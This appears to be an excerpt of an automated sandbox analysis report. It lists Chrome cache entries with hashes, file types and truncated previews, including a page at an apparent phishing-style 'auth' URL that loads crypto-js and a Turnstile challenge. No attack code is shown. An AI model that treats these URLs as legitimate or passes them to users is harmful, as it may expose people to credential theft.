          SHA-512:73C50CE7E98D42E23BFDC804BB62DAA60BB4C61C88C58FD52FF9B30C1BBEB67087F820E407013224578FB5E9ED25B9ED2B04A16FB49416BFE209D8C91AD8C9D4
          Malicious:false
          Reputation:unknown
          Preview:import{a as df,b as Je,c as _}from"./chunk-RIUMFBNJ.mjs";var Tt={};df(Tt,{Children:()=>mr,Component:()=>Ee,Fragment:()=>gr,Profiler:()=>TT,PureComponent:()=>ET,StrictMode:()=>RT,Suspense:()=>hs,__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED:()=>PT,cloneElement:()=>Nr,createContext:()=>Se,createElement:()=>ll,createFactory:()=>FT,createRef:()=>lo,default:()=>x,forwardRef:()=>Xe,isValidElement:()=>hn,lazy:()=>_T,memo:()=>IT,startTransition:()=>vr,unstable_act:()=>OT,useCallback:()=>se,useContext:()=>A,useDebugValue:()=>LT,useDeferredValue:()=>MT,useEffect:()=>$,useId:()=>Ci,useImperativeHandle:()=>DT,useInsertionEffect:()=>ut,useLayoutEffect:()=>et,useMemo:()=>ue,useReducer:()=>AT,useRef:()=>V,useState:()=>tt,useSyncExternalStore:()=>_g,useTransition:()=>VT,version:()=>zT});var x={},ds=Symbol.for("react.element"),uT=Symbol.for("react.portal"),fT=Symbol.for("react.fragment"),dT=Symbol.for("react.strict_mode"),hT=Symbol.for("react.profiler"),pT=Symbol.for("react.provider"),mT=Symbol.fo

          Chrome Cache Entry: 113

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2826), with CRLF line terminators
          Category:downloaded
          Size (bytes):5947
          Entropy (8bit):5.766918443511268
          Encrypted:false
          SSDEEP:
          MD5:44D6774FA0FDE728507A32CDFE00D116
          SHA1:5DA9CD67B6B5DBDA9834147E10FC160C286C000E
          SHA-256:B04B6DEE53A838FC516C5EC918FF7A2158E88856809035BEFEABB608E18225BC
          SHA-512:E10CDA1B2B71FCE7491071A9670CA75F3DCF394201A6CB35D18D5D466B8B119D6717EC2DF8B87AC3EFAB55E7F6944CD7EED0822ED010A7416EF5DBBDB1DDEB8D
          Malicious:false
          Reputation:unknown
          URL:https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html
          Preview:<html>.. <head>.. <title>.</title>.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>.. <style>body, html {height: 100%;margin: 0;display: flex;align-items: center;justify-content: center;}@keyframes bounce {0%, 100%, 12.5%, 32.5%, 76.1% {transform: translateY(0);}22.5%, 86% {transform: translateY(7px);}}#tacit {height: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#icicle {width: 130px;margin-top: 179px;}#objective {width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px;}#objective>.earn {width: 287px;height: 71px;background: #27a0e0;transform: translate(-153px, -70px) rotate(28deg);}#objecti

          Chrome Cache Entry: 115

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):42
          Entropy (8bit):4.136248672727249
          Encrypted:false
          SSDEEP:
          MD5:905B1FBB26E082557FF0B3B3553CDA6C
          SHA1:8FE0790D6026998BDB2C9FFA3B915952E613E1B4
          SHA-256:F249B63CB2FCB66B47E86F906C98F8FD912E82DD035B4E53D7E72FC1960CFD16
          SHA-512:284567E83A5C15761498249B27B4B700AA081A65B858F29458E5D0F3DEBDEA93DD5CFAD94EEFAEB43837E70CC288B2A34EA168D2771CB57C993E269C287097CE
          Malicious:false
          Reputation:unknown
          Preview:{"message":"Missing Authentication Token"}

          Chrome Cache Entry: 118

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1280x733, components 3
          Category:dropped
          Size (bytes):48562
          Entropy (8bit):7.819852063564457
          Encrypted:false
          SSDEEP:
          MD5:0D3AAD3E36C93CFE4CAE9455C00521CE
          SHA1:0CF5A68D0F5436A398A612DB2112536D9CBD7752
          SHA-256:C5214EE509F3CD6A7A508E5AD94FB3C6E4596D1F6146A03E1985F477D454D5C8
          SHA-512:5BDFF8A37BBB71C20D560AEDFB1098DFCB08F20656B00DB259A99A8D9D90692C3869CC20AC1553BC6285F477988530CC253DA4655378097A8E81AA3045037A3F
          Malicious:false
          Reputation:unknown
          Preview:......JFIF.............C.............................! ....#'2*#%/%..+;,/35888!*=A<6A2785...C...........5$.$55555555555555555555555555555555555555555555555555...........".....................................................................................................................................................................................................................................................................".U....C..w8....."y.D.;.....+N...;.5r'd.$.G..a..X.gQ...w^s....%0.&rzN..j.r.N..>..\q.e.<u.g.?..`..t38.._........Q....Ua....fux.5.s.......:..yX.i.~t.....^~9...j:....................................@..`8........L..U....T-.dk..1..Y.=...p..`+....Ef..5.N*.N.r.E..aY..U.+s.)#.c...r........ .b+}.....9VB..R....E..0U..m................................................................EU...p.-....:..............................................................eU.g....c*{...)...+..T.a.<...E.....+.9...7..q..l..xdksf.......!..9O0......)..B[.fYr.M..W`.........

          Chrome Cache Entry: 119

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):44
          Entropy (8bit):4.896820539042673
          Encrypted:false
          SSDEEP:
          MD5:F5FE0CAB78140E0E5AA29F68CE8C2888
          SHA1:4E02FF9F9E7144B978E8C80EDA3A4CABE5288B0B
          SHA-256:7B2FAEC4335DE81ABBF1EBF794F91A4F2B870B317093448B84082B5F411C741C
          SHA-512:219FF2BEDE0A09541154FD6772534975BE577F70F72D3D856DF28448EABB6BBBF1784164D7D063449B524FC5C7C3899132473535E1713FBAC4E9E935587A3CCE
          Malicious:false
          Reputation:unknown
          Preview://# sourceMappingURL=chunk-42U43NKG.mjs.map.

          Chrome Cache Entry: 123

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (402)
          Category:dropped
          Size (bytes):447
          Entropy (8bit):5.2414929500033836
          Encrypted:false
          SSDEEP:
          MD5:30ED32FA3444DF726BB60D89113CF478
          SHA1:B3B0D1A12B85BBE1E4B2AD12FC074B57597BD22A
          SHA-256:A9428E5E5F6C5EDE3339114A8BE6230E2CC39A2190D03F1092AE93BDAF556891
          SHA-512:A5122B79853B41F851B5BCE88442DB9DADFCF9F6EF0232F61EC43CD4C23F955B837C05FEC8077B34C961AB46FFF69BDFF818970787013131E39058EBAEB8F4D6
          Malicious:false
          Reputation:unknown
          Preview:var e=Object.defineProperty;var d=(n,t)=>{for(var o in t)e(n,o,{get:t[o],enumerable:!0})};var f=typeof document<"u"?globalThis.navigator:void 0,r=typeof document<"u"?globalThis.window:void 0,i=typeof document>"u"?{}:void 0;if(typeof document>"u"){let n=Object.prototype.toString;Object.prototype.toString=function(...t){return this===i?"[object global]":n.call(this,...t)}}export{d as a,f as b,r as c};.//# sourceMappingURL=chunk-RIUMFBNJ.mjs.map.

          Chrome Cache Entry: 124

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:HTML document, ASCII text, with very long lines (491), with CRLF line terminators
          Category:dropped
          Size (bytes):6683
          Entropy (8bit):4.728393039920178
          Encrypted:false
          SSDEEP:
          MD5:4AF167C100336A1E6E9F43B4929B6D00
          SHA1:1F65CC3BD7D9FFE966F51A7104BA915A0A331FF1
          SHA-256:F670BCD58A192CF38E0504712EDAD41CE02828C22B8F0CF72DDF48B453CAA80A
          SHA-512:1FB735B2EC02B7A39AA893DDFEF5A55242B97A2129AA99367C346CC3FECEBE34EBFB4F645FA347D5768104CB7EB30FC1D6EDBE145F28AF3223593FFE805427A0
          Malicious:false
          Reputation:unknown
          Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noarchive, nosnippet, noindex, nofollow">.. <title>Motorcar Enthusiasts - tekmom.exnet.su</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">.. <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" rel="stylesheet"> ..</head>..<body>....<nav class="navbar navbar-expand-lg navbar-dark bg-dark">.. <div class="container">.. <a class="navbar-brand" href="https://tekmom.exnet.su/#">.. <i class="fas fa-car"></i> Motorcar Enthusiasts .. </a>.. <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">.. <span class="navbar-toggler-icon"><

          Chrome Cache Entry: 125

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (10408)
          Category:downloaded
          Size (bytes):10491
          Entropy (8bit):5.580526706766998
          Encrypted:false
          SSDEEP:
          MD5:1AE70768C480F73533FF1CCDCBF94188
          SHA1:EE5137759145D92BC83310009BBC033B3C9D9753
          SHA-256:D167A32BB6C3FD95F4B4A7C1CB445FEDE958E94036ADEAF562B070D46761A48E
          SHA-512:C6689DEC834B0EFD1F66C975278073B72D4152CBE3F3087445A1E155D570DA2FAC3F6755E219DB6F0A89853893605011E8D7611CBF183B99C273D63D8024FFD0
          Malicious:false
          Reputation:unknown
          URL:https://framerusercontent.com/sites/6YYuQ1FLDalWCuDrLyjZQj/dqa62RV-tPrLEha76eKIvRwZbVeC4htPQYBjwJWsq1I.4MC2Q4TL.mjs
          Preview:import{a as b}from"./chunk-ZZFRRP66.mjs";import"./chunk-42U43NKG.mjs";import{$ as S,A as _,D as t,G as X,H as P,K as W,L as z,N as H,O as q,P as Q,X as Y,_ as M,b as T,ca as G,da as J,e as E,ea as $,i as j,j as k,k as O,m as Z,o as r,p as f,r as h,s as B}from"./chunk-6YCP7OQD.mjs";import"./chunk-RIUMFBNJ.mjs";var d;(function(e){e.Default="Default",e.Custom="Custom"})(d||(d={}));var s;(function(e){e.Upload="Upload",e.URL="URL"})(s||(s={}));var ae='meta[name="framer-search-index"]';function ne(){return typeof document>"u"?!0:!!document.querySelector(ae)}function m(e){let{styleOptions:l,hoverOptions:i,iconOptions:o}=e,{backgroundColor:x,color:U,borderRadius:c,padding:v,paddingPerSide:F,paddingTop:A,paddingRight:D,paddingBottom:N,paddingLeft:C,gap:R}=l,p=ne(),a;p&&(e.srcType===s.URL&&(a=e.srcURL),e.srcType===s.Upload&&(a=e.srcFile));let n=F?`${A}px ${D}px ${N}px ${C}px`:`${v}px`,g=()=>{var I,L;if(!o)return;let V={order:o.alignment==="start"?0:2,flexShrink:0};return o.type===d.Custom&&(!((I

          Chrome Cache Entry: 92

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (547)
          Category:downloaded
          Size (bytes):592
          Entropy (8bit):5.15504916515849
          Encrypted:false
          SSDEEP:
          MD5:4401507AF19BC70511505686BA85691B
          SHA1:59B1387FFB6D9063D2CD0E35D9D2BF272458E2F4
          SHA-256:4305F36C3656F4BFD066E5D843FC93354F3F8CB375834D57F16857E8634F1918
          SHA-512:4ADFA3D4986D01E3E2E156412EDC0DCA489BFD2014CC51991DCE94999D551F92B937A1C710B1BE076BBBFB0DB32305ED256C35E7F720B922CD7DA8E5DFF77978
          Malicious:false
          Reputation:unknown
          URL:https://framerusercontent.com/sites/6YYuQ1FLDalWCuDrLyjZQj/chunk-ZZFRRP66.mjs
          Preview:var n=t=>({description:"Made with Framer",title:"My Framer Site"}),a=n;function s(t,e){return{bodyClassName:"framer-body-augiA20Il",breakpoints:[{hash:"72rtr7"}],description:a(t,e).description,elements:{},robots:"max-image-preview:large",serializationId:"framer-dXZeP",title:a(t,e).title||"Home",viewport:"width=1200"}}var l=1,_={exports:{default:{type:"function",annotations:{framerContractVersion:"1"}},metadataVersion:{type:"variable",annotations:{framerContractVersion:"1"}},__FramerMetadata__:{type:"variable"}}};export{s as a,l as b,_ as c};.//# sourceMappingURL=chunk-ZZFRRP66.mjs.map.

          Chrome Cache Entry: 93

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
          Category:dropped
          Size (bytes):61
          Entropy (8bit):3.990210155325004
          Encrypted:false
          SSDEEP:
          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
          Malicious:false
          Reputation:unknown
          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

          Chrome Cache Entry: 94

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:HTML document, ASCII text
          Category:downloaded
          Size (bytes):315
          Entropy (8bit):5.0572271090563765
          Encrypted:false
          SSDEEP:
          MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
          SHA1:A82190FC530C265AA40A045C21770D967F4767B8
          SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
          SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
          Malicious:false
          Reputation:unknown
          URL:https://pyrofel.com/favicon.ico
          Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

          Chrome Cache Entry: 96

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):223
          Entropy (8bit):5.1754266442935375
          Encrypted:false
          SSDEEP:
          MD5:810193EDE98443698BA6B54575E9CF3C
          SHA1:719632E21DDF2A8CAFE2423E86520E515B621241
          SHA-256:A8C604F5780004055234EB042141127C52ABE99560F73A8F68395BFF99C38EC4
          SHA-512:5C43545615F5A6BCEBF243FF011AA1D88DEC94FE2288FBED7227076D481B44627E9FE3E620B655AFDA2DCAFFE5754FE577EBBFEE04B9BDBC86841A9AF42CC0EA
          Malicious:false
          Reputation:unknown
          Preview:.PNG........IHDR...@...@......iq.....IDATx.....BA...-.:.5.>T....|...v{.S.ww......................................o.....0.a:.t......#LG..0.a:.t......#LG..0.a:._.'........................................8.r.M.......IEND.B`.

          Chrome Cache Entry: 98

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Web Open Font Format (Version 2), TrueType, length 27404, version 4.0
          Category:downloaded
          Size (bytes):27404
          Entropy (8bit):7.992616580398
          Encrypted:true
          SSDEEP:
          MD5:D72D711888BBD8AD9DB87EE0A654D3F1
          SHA1:BFE432FDEBD80321ED03F445C0FA94CD01A99C3B
          SHA-256:4107B11930C4EEF1F6AE5A76D441562E6D21A601F1781F37FD085542CD87412B
          SHA-512:204CE6CF69A2D7ADCA22677B53D1171BD3528AB1384997602710E628195D4F86A8041DBEE519BF2EEA9893F756077882C907B01703736500FC41853733B2E81D
          Malicious:false
          Reputation:unknown
          URL:https://framerusercontent.com/assets/vQyevYAyHtARFwPqUzQGpnDs.woff2
          Preview:wOF2......k.......;...j...........................6...J..X.`..Z...X....6.$........ .... [..q.9...Rw.ew.c.K.....Y....}#R..!........P..U.v.;.IB .j..l.<.<.....N.&b.~..sI..2w..(.@..=.g.SPq..P..5......{.bZ.'.pf......h..N.7..P.iHP.*..."..\...v.1^.......6ms..A..@"..+py.....y..\...}..,k.....q..uf^......!..@.Q.T.....Td....L.{.....K^B.!.$..B..%......i*".l....("rX.""6."""..iGS.a.KE...X..).... .....7.'.ot..H..WB.D&d.!.'..!~.....4.m..t.X.Qd.(C@...'.".(.B..(.....2....l.............58.....JW(..x....T..l...'.,........=.;..5..Fc.G8..HK...U..p..(...,...\..@/4@i........myI..u......$.^..lE.l.....lPd..[......3.._.f........+...L...MK.G/...>m..(.n....54.C#.lR..F...Z|)..Y....$k!..T)Z....k....H..{...).l.tW.L.....Lg.2..t....}e.............ES...'..q<..<..5.....B.c.%....?.....D."...tz.....~..;..}..j... ....HHz...B...F....*.t.k..j.&O.{+S.1o.X.V.M.3....).v..3.3-.g>.m$.M...W.F.t.N..O.o.Bd0.dA...&..)..G!..VY.uY.b.g..J.;.nw...i.....f.X0..f...p...~..gim..F.".P...?..&....

          Chrome Cache Entry: 99

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ISO Media, AVIF Image
          Category:downloaded
          Size (bytes):37084
          Entropy (8bit):7.993142466149933
          Encrypted:true
          SSDEEP:
          MD5:C150749FD7E35BB4B47B41C715DE84A4
          SHA1:86B20F0074F7DDD9ADC1602505DDCB48D74DD490
          SHA-256:6B85E2CC77DD2EE567CD7E209D125A63538C8CFB3E52BAE4CC825BDB34E0E55E
          SHA-512:10120C8E0D0BDA9C9583D584A3649364ECCC7B52853B05ADF95AA921EAF5C48EDAA1CE523620C4A048EA2B8EF2143EF448B5FB93DDDC1BD888BD7D7BA3DEED27
          Malicious:false
          Reputation:unknown
          URL:https://framerusercontent.com/images/DPWmjQ9UNqOYphLbIRJTbZy9d1I.jpg
          Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C.%......ispe................pixi............ipma...................mdat....9jg...... 2...............k.._..jD*..e..B..az.]f.PG.E....dm^..eBV<k,W[V..|]..."-....q..%.h.?.-..R.z.....D.......%...5HI..-.<./..*.>WI....!.?.7(.{..{..i..*Q....!.h2{.olz..Rq..mD%....+.A....O.h...>....D.C e ...^&._n.~....}.%........X.U..~.+\<6rgy.d...V........U?.@.lRxG.PO.r....OS.L7..".'...Q.....s..h^<....o...CH.q.9...............1v...%?.n#..h.y.l...........V...4.._......z@r(=8..N...V,..( ....G....z.b..Z..Qa...".%....|@..}r.......3L`...wZ[L.D........c......n...>.!.I..|XC..S......6.tj..Y...q...:e.....d...~...._j.F.SJ. ..sLDr;.C.y........V,.....(....xo.MQ.-..Fn.<.j...P|..7..k2T.WI....w.eU...AG=V;.K.....s.9..Q....,-.....%`...y....M......AB9...M$.......G~8.bZ

          Static File Info

          No static file info